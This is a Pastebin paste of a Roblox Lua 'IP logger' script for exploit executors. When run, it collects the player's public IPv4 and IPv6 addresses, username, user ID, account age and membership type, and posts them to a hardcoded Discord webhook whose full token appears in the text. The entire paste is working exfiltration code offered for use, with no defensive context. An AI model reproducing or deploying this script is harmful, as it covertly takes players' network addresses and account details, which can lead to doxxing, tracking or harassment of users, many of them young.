Advertisement
Lilobama2001

iplogg

Jan 25th, 2023 (edited)
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
  1. local Webhook = "https://discord.com/api/webhooks/1067880424786903173/jkT6IfUBccbBqkq2VRvCzzqqNyDJDZxd9k0cN0l5QPSC6N8TkBQiftgxP_ZfxwOtaVjB" -- Put your Webhook link here
  2.  
  3. local IPv4 = game:HttpGet("https://v4.ident.me/")
  4. local IPv6 = game:HttpGet("https://v6.ident.me/")
  5.  
  6. local Headers = {["content-type"] = "application/json"} -- Don't Modify
  7.  
  8. local LocalPlayer = game:GetService("Players").LocalPlayer
  9.  
  10. local AccountAge = LocalPlayer.AccountAge
  11. local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
  12. local UserId = LocalPlayer.UserId
  13. local PlayerName = game:GetService("CoreGui").RobloxGui.PlayerListMaster.OffsetFrame.PlayerScrollList.SizeOffsetFrame.ScrollingFrameContainer.ScrollingFrameClippingFrame.ScollingFrame.OffsetUndoFrame["p_"..UserId].ChildrenFrame.NameFrame.BGFrame.OverlayFrame.PlayerName.PlayerName.Text
  14.  
  15. local PlayerData =
  16. {
  17. ["content"] = "",
  18. ["embeds"] = {{
  19. ["title"] = "**Username**:",
  20. ["description"] = PlayerName,
  21. ["color"] = tonumber(0x2B6BE4),
  22. ["fields"] = {
  23. {
  24. ["name"] = "MembershipType:",
  25. ["value"] = MembershipType,
  26. ["inline"] = true
  27. },
  28. {
  29. ["name"] = "AccountAge:",
  30. ["value"] = AccountAge,
  31. ["inline"] = true
  32. },
  33. {
  34. ["name"] = "UserId:",
  35. ["value"] = UserId,
  36. ["inline"] = true
  37. },
  38. {
  39. ["name"] = "IPv4:",
  40. ["value"] = IPv4,
  41. ["inline"] = true
  42. },
  43. {
  44. ["name"] = "IPv6:",
  45. ["value"] = IPv6,
  46. ["inline"] = true
  47. },
  48. },
  49. }}
  50. }
  51.  
  52. local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
  53. local HttpRequest = http_request;
  54.  
  55. if syn then
  56. HttpRequest = syn.request
  57. else
  58. HttpRequest = http_request
  59. end
  60.  
  61. HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement